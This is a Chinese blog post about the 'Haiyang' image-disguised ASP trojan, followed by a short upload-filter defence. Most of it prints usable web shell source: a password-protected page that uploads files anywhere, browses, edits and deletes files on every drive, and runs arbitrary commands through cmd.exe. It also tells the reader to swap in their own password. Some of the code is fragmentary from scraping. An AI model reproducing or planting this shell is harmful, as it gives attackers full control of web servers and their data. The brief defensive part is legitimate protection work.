图片木马（海阳木马）的代码及防止上传的方法

最新推荐文章于 2024-07-28 22:23:00 发布

cncco

最新推荐文章于 2024-07-28 22:23:00 发布

阅读量4.1k

点赞数

CC 4.0 BY-SA版权

分类专栏： ASP 文章标签： path upload vbscript shell url 服务器

本文链接：https://blog.youkuaiyun.com/cncco/article/details/1673222

ASP 专栏收录该内容

54 篇文章

订阅专栏

本文介绍了两种ASP木马的实现方式，一种是利用复杂的HTML和脚本代码隐藏恶意功能，另一种则是通过上传文件大小限制和文件内容检查来防范潜在的木马上传。文章深入剖析了木马的工作原理及防御策略。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

一、海阳图片木马代码：

其实不一定是这样，只要是HTML代码或ASP任何代码均可。

<%@ LANGUAGE="VBSCRIPT" codepage ="936" %>

<style>

body{font-family: 宋体

; font-size: 10pt}

table{ font-family: 宋体; font-size: 9pt }

a{ font-family: 宋体; font-size: 9pt; color: #000000; text-decoration: none }

a:hover{ font-family: 宋体; color: #807123; text-decoration: none }

input { BORDER-RIGHT: #888888 1px solid; BORDER-TOP: #888888 1px solid; BACKGROUND: #ffffff; BORDER-LEFT: #888888 1px solid; BORDER-BOTTOM: #888888 1px solid; FONT-FAMILY: "Verdana", "Arial"font-color: #ffffff;FONT-SIZE: 9pt;

</style>

<% if request("up")=1 then %>

<%Server.ScriptTimeOut=5000%>

dim Data_5xsoft

Class upload_5xsoft

dim objForm,objFile,Version

Public function Form(strForm)

strForm=lcase(strForm)

if not objForm.exists(strForm) then

Form=""

else

Form=objForm(strForm)

end if

end function

Public function File(strFile)

strFile=lcase(strFile)

if not objFile.exists(strFile) then

set File=new FileInfo

else

set File=objFile(strFile)

end if

end function

Private Sub Class_Initialize

dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile

dim iFileSize,sFilePath,sFileType,sFormValue,sFileName

dim iFindStart,iFindEnd

dim iFormStart,iFormEnd,sFormName

set objForm=Server.CreateObject("Scripting.Dictionary")

set objFile=Server.CreateObject("Scripting.Dictionary")

if Request.TotalBytes<1 then Exit Sub

set tStream = Server.CreateObject("adodb.stream")

set Data_5xsoft = Server.CreateObject("adodb.stream")

Data_5xsoft.Type = 1

Data_5xsoft.Mode =3

Data_5xsoft.Open

Data_5xsoft.Write Request.BinaryRead(Request.TotalBytes)

Data_5xsoft.Position=0

RequestData =Data_5xsoft.Read

iFormStart = 1

iFormEnd = LenB(RequestData)

vbCrlf = chrB(13) & chrB(10)

sStart = MidB(RequestData,1, InStrB(iFormStart,RequestData,vbCrlf)-1)

iStart = LenB (sStart)

iFormStart=iFormStart+iStart+1

while (iFormStart + 10) < iFormEnd

iInfoEnd = InStrB(iFormStart,RequestData,vbCrlf & vbCrlf)+3

tStream.Type = 1

tStream.Mode =3

tStream.Open

Data_5xsoft.Position = iFormStart

Data_5xsoft.CopyTo tStream,iInfoEnd-iFormStart

tStream.Position = 0

tStream.Type = 2

tStream.Charset ="gb2312"

sInfo = tStream.ReadText

tStream.Close

iFormStart = InStrB(iInfoEnd,RequestData,sStart)

iFindStart = InStr(22,sInfo,"name=""",1)+6

iFindEnd = InStr(iFindStart,sInfo,"""",1)

sFormName = lcase(Mid (sinfo,iFindStart,iFindEnd-iFindStart))

if InStr (45,sInfo,"filename=""",1) > 0 then

set theFile=new FileInfo

iFindStart = InStr(iFindEnd,sInfo,"filename=""",1)+10

iFindEnd = InStr(iFindStart,sInfo,"""",1)

sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)

theFile.FileName=getFileName(sFileName)

theFile.FilePath=getFilePath(sFileName)

iFindStart = InStr(iFindEnd,sInfo,"Content-Type: ",1)+14

iFindEnd = InStr(iFindStart,sInfo,vbCr)

theFile.FileType =Mid (sinfo,iFindStart,iFindEnd-iFindStart)

theFile.FileStart =iInfoEnd

theFile.FileSize = iFormStart -iInfoEnd -3

theFile.FormName=sFormName

if not objFile.Exists(sFormName) then

objFile.add sFormName,theFile

end if

else

tStream.Type =1

tStream.Mode =3

tStream.Open

Data_5xsoft.Position = iInfoEnd

Data_5xsoft.CopyTo tStream,iFormStart-iInfoEnd-3

tStream.Position = 0

tStream.Type = 2

tStream.Charset ="gb2312"

sFormValue = tStream.ReadText

tStream.Close

if objForm.Exists(sFormName) then

objForm(sFormName)=objForm(sFormName)&", "&sFormValue

else

objForm.Add sFormName,sFormValue

end if

iFormStart=iFormStart+iStart+1

wend

RequestData=""

set tStream =nothing

End Sub

Private Sub Class_Terminate

if Request.TotalBytes>0 then

objForm.RemoveAll

objFile.RemoveAll

set objForm=nothing

set objFile=nothing

Data_5xsoft.Close

set Data_5xsoft =nothing

end if

End Sub

Private function GetFilePath(FullPath)

If FullPath <> "" Then

GetFilePath = left(FullPath,InStrRev(FullPath, ""))

Else

GetFilePath = ""

End If

End function

Private function GetFileName(FullPath)

If FullPath <> "" Then

GetFileName = mid(FullPath,InStrRev(FullPath, "")+1)

Else

GetFileName = ""

End If

End function

End Class

Class FileInfo

dim FormName,FileName,FilePath,FileSize,FileType,FileStart

Private Sub Class_Initialize

FileName = ""

FilePath = ""

FileSize = 0

FileStart= 0

FormName = ""

FileType = ""

End Sub

Public function SaveAs(FullPath)

dim dr,ErrorChar,i

SaveAs=true

if trim(fullpath)="" or FileStart=0 or FileName="" or right(fullpath,1)="/" then exit function

set dr=CreateObject("Adodb.Stream")

dr.Mode=3

dr.Type=1

dr.Open

Data_5xsoft.position=FileStart

Data_5xsoft.copyto dr,FileSize

dr.SaveToFile FullPath,2

dr.Close

set dr=nothing

SaveAs=false

end function

End Class

</SCRIPT>

dim upload,file,formName,formPath,iCount

set upload=new upload_5xsoft

if upload.form("filepath")="" then

response.write "请输入要上传至的目录!"

set upload=nothing

response.end

else

formPath=upload.form("filepath")

if right(formPath,1)<>"/" then formPath=formPath&"/"

end if

iCount=0

for each formName in upload.objForm

response.write "<br>"

for each formName in upload.objFile

set file=upload.file(formName)

if file.FileSize>0 then

file.SaveAs Server.mappath(formPath&file.FileName)

response.write "<center>"&file.FilePath&file.FileName&" ("&file.FileSize&") => "&formPath&File.FileName&" 上传成功!</center><br>"

iCount=iCount+1

end if

set file=nothing

set upload=nothing

response.write "<center>"&iCount&"个文件上传结束!</center>"

response.write "<center><br><a href=""javascript:history.back();""><font color='#D00000'>返回上一页</font></a></center>"

else

url= Request.ServerVariables("URL")

'修改下面的haiyangtop.126.com改为你密码

if trim(request.form("password"))="haiyangtop.126.com" then

response.cookies("password")="allen"

response.redirect ""&url&""

else if Request.Cookies("password")<>"allen" then

call login()

response.end

end if

select case request("id")

case "edit"

call edit()

case "upload"

call upload()

case "dir"

call dir()

case else

call main()

end select

end if

sub login()

for i=0 to 25

on error resume next

IsObj=false

VerObj=""

dim TestObj

set TestObj=server.CreateObject(ObjTotest(i,0))

If -2147221005 <> Err then

IsObj = True

VerObj = TestObj.version

if VerObj="" or isnull(VerObj) then VerObj=TestObj.about

end if

ObjTotest(i,2)=IsObj

ObjTotest(i,3)=VerObj

</tr>

<td align=left> 服务器IP</td>

</tr>

<td align=left> 服务器端口</td>

</tr>

<td align=left> 服务器时间</td>

</tr>

<td align=left> 本文件绝对路径</td>

</tr>

<td align=left> 服务器CPU数量</td>

</tr>

<td align=left> 服务器操作系统</td>

</tr>

<td align=left><font class=fonts>服务器运算速度测试</font></td>

</tr>

<td align=left>Allen的电脑（521M,Athlon2200+）</td>

</tr>

<td align=left>中国频道虚拟主机（2002-08-06）</td>

</tr>

<td align=left>西部数码west263主机（2002-08-06）</td>

</tr>

<tr bgcolor="#FFFFFF" height=18><%

dim t1,t2,lsabc,thetime

t1=timer

for i=1 to 500000

lsabc= 1 + 1

t2=timer

thetime=cstr(int(( (t2-t1)*10000 )+0.5)/10)

%><td align=left><font color=red>您正在使用的这台服务器</font> </td>

</tr>

</table>

</td>

</tr>

</table>

<html>

<table>

<%response.write "<font class=fonts>一次只能执行一个操作:)在本页操作不需要FSO支持&当服务器时间</font>" %>

<%response.write now()%><BR>

<form action="<%= Request.ServerVariables("URL") %>" method="POST">

<input type=text name=text value="<%=szCMD %>"> <font class=fonts>输入要浏览的目录,最后要加</font><br>

copy

move

路径：<input type=text name=text5 value="<%=szCMD5 %>">

程序：<input type=text name=text6 value="<%=szCMD6 %>"><br>

</form>

</table>

</center>

</body>

</html>

szCMD = Request.Form("text") '目录浏览

if (szCMD <> "") then

set shell=server.createobject("shell.application") '建立shell对象

set fod1=shell.namespace(szcmd)

set foditems=fod1.items

for each co in foditems

response.write "<font color=red>" & co.path & "-----" & co.size & "</font><br>"

end if

szCMD1 = Request.Form("text1") '目录拷贝，不能进行文件拷贝

szCMD2 = Request.Form("text2")

if szcmd1<>"" and szcmd2<>"" then

set shell1=server.createobject("shell.application") '建立shell对象

set fod1=shell1.namespace(szcmd2)

for i=len(szcmd1) to 1 step -1

if mid(szcmd1,i,1)="" then

path=left(szcmd1,i-1)

exit for

end if

if len(path)=2 then path=path & ""

path2=right(szcmd1,len(szcmd1)-i)

set fod2=shell1.namespace(path)

set foditem=fod2.parsename(path2)

fod1.copyhere foditem

response.write "command completed success!"

end if

szCMD3 = Request.Form("text3") '目录移动

szCMD4 = Request.Form("text4")

if szcmd3<>"" and szcmd4<>"" then

set shell2=server.createobject("shell.application") '建立shell对象

set fod1=shell2.namespace(szcmd4)

for i=len(szcmd3) to 1 step -1

if mid(szcmd3,i,1)="" then

path=left(szcmd3,i-1)

exit for

end if

if len(path)=2 then path=path & ""

path2=right(szcmd3,len(szcmd3)-i)

set fod2=shell2.namespace(path)

set foditem=fod2.parsename(path2)

fod1.movehere foditem

response.write "command completed success!"

end if

szCMD5 = Request.Form("text5") '执行程序要指定路径

szCMD6 = Request.Form("text6")

if szcmd5<>"" and szcmd6<>"" then

set shell3=server.createobject("shell.application") '建立shell对象

shell3.namespace(szcmd5).items.item(szcmd6).invokeverb

response.write "command completed success!"

end if

Enter Password：<input type="password" name="password"size="20">

</center></form>

</body>

<%end sub%>

<%sub main()

'修改下面的urlpath改为你服务器的实际URL

urlpath="http://localhost"

dim cpath,lpath

set fsoBrowse=CreateObject("Scripting.FileSystemObject")

if Request("path")="" then

lpath="/"

else

lpath=Request("path")&"/"

end if

if Request("attrib")="true" then

cpath=lpath

attrib="true"

else

cpath=Server.MapPath(lpath)

attrib=""

end if

%><html>

function crfile(ls)

{if (ls==""){alert("请输入文件名!");}

else {window.open("<%=url%>?id=edit&attrib=<%=request("attrib")%>&creat=yes&path=<%=lpath%>"+ls);}

return false;

}

function crdir(ls)

{if (ls==""){alert("请输入文件名!");}

else {window.open("<%=url%>?id=dir&attrib=<%=request("attrib")%>&op=creat&path=<%=lpath%>"+ls);}

return false;

}

</script>

sub rmdir(ls)

if confirm("你真的要删除这个目录吗!"&Chr(13)&Chr(10)&"目录为："&ls) then

window.open("<%=url%>?id=dir&path="&ls&"&op=del&attrib=<%=request("attrib")%>")

end if

end sub

sub copyfile(sfile)

dfile=InputBox(""&Chr(13)&Chr(10)&"源文件："&sfile&Chr(13)&Chr(10)&"请输入目标文件的文件名:"&Chr(13)&Chr(10)&"许带路径,要根据你的当前路径模式. 注意:绝对路径示例c:/或c:都可以")

dfile=trim(dfile)

attrib="<%=request("attrib")%>"

if dfile<>"" then

if InStr(dfile,":") or InStr(dfile,"/")=1 then

lp=""

if InStr(dfile,":") and attrib<>"true" then

alert "对不起，你在相对路径模式下不能使用绝对路径"&Chr(13)&Chr(10)&"错误路径：["&dfile&"]"

exit sub

end if

else

lp="<%=lpath%>"

end if

window.open(""&url&"?id=edit&path="+sfile+"&op=copy&attrib="+attrib+"&dpath="+lp+dfile)

else

alert"您没有输入文件名！"

end If

end sub

</script><body bgcolor="#F5F5F5">

<TABLE cellSpacing=1 cellPadding=3 width="750" align=center

bgColor=#b8b8b8 border=0>

<TBODY>

<TR >

<TD

height=22 colspan="4" bgcolor="#eeeeee" >切换盘符：

For Each thing in fsoBrowse.Drives

Response.write "<a href='"&url&"?path="&thing.DriveLetter&":&attrib=true'>"&thing.DriveLetter&"盘:</a> "

%> 本机局域网地址：

Set oScript = Server.CreateObject("WSCRIPT.SHELL")

Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")

Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

%><%= "/" & oScriptNet.ComputerName & "" & oScriptNet.UserName %> </TD>

</TR> <TD colspan="4" bgcolor="#ffffff" ><%

if Request("attrib")="true" then

response.write "<a href='"&url&"'><font color='#D00000'>点击切换到相对路径编辑模式</font></a>"

else

response.write "<a href='"&url&"?attrib=true'><font color='#D00000'>点击切换到绝对路径编辑模式</font></a>"

end if

%>绝对路径: <%=cpath%> 当前浏览目录:<%=lpath%></TD></TR> <TR>

浏览目录: <input type="text" name="path" size="30" value="c:">

<input type="submit" name="Submit" value="浏览目录" > 〖请使用绝对路径,支持局域网地址！〗

</TD></form>

</TR><TR >

<TD colspan="4" bgcolor="#ffffff" ><form name="form1" method="post" action="<%=url%>?up=1" enctype="multipart/form-data" >

上传到:

文件地址:

<input type="submit" name="Submit" value="上传文件" > 〖请使用相对路径！〗

</TD>

</form></TR>

On Error Resume Next

Set oScript = Server.CreateObject("WSCRIPT.SHELL")

Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")

Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

szCMD = Request.Form(".CMD")

If (szCMD <> "") Then

szTempFile = "C:" & oFileSys.GetTempName( )

Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)

Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)

End If%>

<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">

<input type=submit value="执行程序" > 〖请使用绝对路径，并且确定你有相应权限！〗

<% If (IsObject(oFile)) Then

On Error Resume Next

Response.Write Server.HTMLEncode(oFile.ReadAll)

oFile.Close

Call oFileSys.DeleteFile(szTempFile, True)

End If %>

</TD> </FORM></TR>

<TD height=22 colspan="4" ><form name="newfile"

onSubmit="return crfile(newfile.filename.value);">

<input type="button" value="新建目录"onclick="crdir(newfile.filename.value)">〖新建文件和新建目录不能同名〗

</TD></form>

</TR>

<TR>

dim theFolder,theSubFolders

if fsoBrowse.FolderExists(cpath)then

Set theFolder=fsoBrowse.GetFolder(cpath)

Set theSubFolders=theFolder.SubFolders

Response.write"<a href='"&url&"?path="&Request("oldpath")&"&attrib="&attrib&"'><font color='#FF8000'>■</font>↑<font color='ff2222'>回上级目录</font></a><br>"

For Each x In theSubFolders

Response.write"<a href='"&url&"?path="&lpath&x.Name&"&oldpath="&Request("path")&"&attrib="&attrib&"'>└<font color='#FF8000'>■</font> "&x.Name&"</a> <a href="&chr(34)&"javascript: rmdir('"&lpath&x.Name&"')"&chr(34)&"><font color='#FF8000' >×</font>删除</a><br>"

end if

</TD>

<TD width="45%" bgColor=#eeeeee>文件名（鼠标移到文件名可以查看给文件的属性）</TD>

</TR>

<TR>

dim theFiles

if fsoBrowse.FolderExists(cpath)then

Set theFolder=fsoBrowse.GetFolder(cpath)

Set theFiles=theFolder.Files

Response.write"<table border='0' width='100%' cellpadding='0'>"

For Each x In theFiles

if Request("attrib")="true" then

showstring="<strong>"&x.Name&"</strong>"

else

showstring="<a href='"&urlpath&lpath&x.Name&"' title='"&"类型"&x.type&chr(10)&"属性"&x.Attributes&chr(10)&"时间："&x.DateLastModified&"'target='_blank'><strong>"&x.Name&"</strong></a>"

end if

Response.write"<tr><td width='50%'><font color='#FF8000'>□</font>"&showstring&"</td><td width='8%'>"&x.size&"</a></td><td width='20%'><a href='"&url&"?id=edit&path="&lpath&x.Name&"&attrib="&attrib&"' target='_blank' > 编辑</a><a href='"&url&"?id=edit&path="&lpath&x.Name&"&op=del&attrib="&attrib&"' target='_blank' > 删除</a><a href='#' onclick=copyfile('"&lpath&x.Name&"')> 复制</a></td></tr>"

end if

Response.write"</table>"

</TD>

</TR></TBODY>

</TABLE>

<% end sub

sub edit()

if request("op")="del" then

if Request("attrib")="true" then

whichfile=Request("path")

else

whichfile=server.mappath(Request("path"))

end if

Set fs = CreateObject("Scripting.FileSystemObject")

Set thisfile = fs.GetFile(whichfile)

thisfile.Delete True

Response.write "<br><center>删除成功！要刷新才能看到效果.</center>"

else

if request("op")="copy" then

if Request("attrib")="true" then

whichfile=Request("path")

dsfile=Request("dpath")

else

whichfile=server.mappath(Request("path"))

dsfile=Server.MapPath(Request("dpath"))

end if

Set fs = CreateObject("Scripting.FileSystemObject")

Set thisfile = fs.GetFile(whichfile)

thisfile.copy dsfile

Response.write "<center><p>源文件："+whichfile+"</center>"

Response.write "<center><br>目的文件："+dsfile+"</center>"

Response.write "<center><br>复制成功！要刷新才能看到效果!</p></center>"

else

if request.form("text")="" then

if Request("creat")<>"yes" then

if Request("attrib")="true" then

whichfile=Request("path")

else

whichfile=server.mappath(Request("path"))

end if

Set fs = CreateObject("Scripting.FileSystemObject")

Set thisfile = fs.OpenTextFile(whichfile, 1, False)

counter=0

thisline=thisfile.readall

thisfile.Close

set fs=nothing

end if

<br>

<TABLE cellSpacing=1 cellPadding=3 width="750" align=center

bgColor=#b8b8b8 border=0>

<TBODY>

<TR >

<TD

height=22 bgcolor="#eeeeee" ><div align="center"></div></TD>

</TR>

<TR >

<TD width="100%"

height=22 bgcolor="#ffffff" >文件名：

<input type="text" name="path" size="45"

value="<%=Request("path")%>"readonly>

</TD>

</TR>

<TR>

<TD

height=22 bgcolor="#eeeeee" > <div align="center">

</div></TD>

</TR>

<TR>

<TD

height=22 bgcolor="#ffffff" ><div align="center">

<input type="submit"

value="提交" name="B1">

</div></TD>

</TR>

</TABLE>

</form>

<%else

if Request("attrib")="true" then

whichfile=Request("path")

else

whichfile=server.mappath(Request("path"))

end if

Set fs = CreateObject("Scripting.FileSystemObject")

Set outfile=fs.CreateTextFile(whichfile)

outfile.WriteLine Request("text")

outfile.close

set fs=nothing

Response.write "<center>修改成功！要刷新才能看到效果!</center>"

end if

end sub

end if

<% sub dir()

if request("op")="del" then

if Request("attrib")="true" then

whichdir=Request("path")

else

whichdir=server.mappath(Request("path"))

end if

Set fs = CreateObject("Scripting.FileSystemObject")

fs.DeleteFolder whichdir,True

Response.write "<center>删除成功！要刷新才能看到效果，删除的目录为:<b>"&whichdir&"</b></center>"

else

if request("op")="creat" then

if Request("attrib")="true" then

whichdir=Request("path")

else

whichdir=server.mappath(Request("path"))

end if

Set fs = CreateObject("Scripting.FileSystemObject")

fs.CreateFolder whichdir

Response.write "<center>建立成功！要刷新才能看到效果,建立的目录为:<b>"&whichdir&"</b></center>"

end if

end sub

<br>

</body>

</html>

二、ASP防上传木马代码

1、首先判断上传文件大小

if file.filesize<10 then

Response.Write("<script>alert('您没有选择上传文件')</script>")

Response.Write("<script>history.go(-1)</script>")

Response.End()

end if

2、将文件上传到服务器后，判断用户文件中的危险操作字符

set MyFile = server.CreateObject("Scripting.FileSystemObject")

set MyText = MyFile.OpenTextFile(FilePath, 1) '读取文本文件

sTextAll = lcase(MyText.ReadAll)

MyText.close

set MyFile = nothing

sNoString = split(sStr,"|")

for i=0 to ubound(sNoString)

if instr(sTextAll,sNoString(i)) then

set filedel = server.CreateObject("Scripting.FileSystemObject")

filedel.deletefile FilePath

set filedel = nothing

Response.Write("<script>alert('您上传的文件有问题，上传失败');window.close();</script>")

Response.End()

end if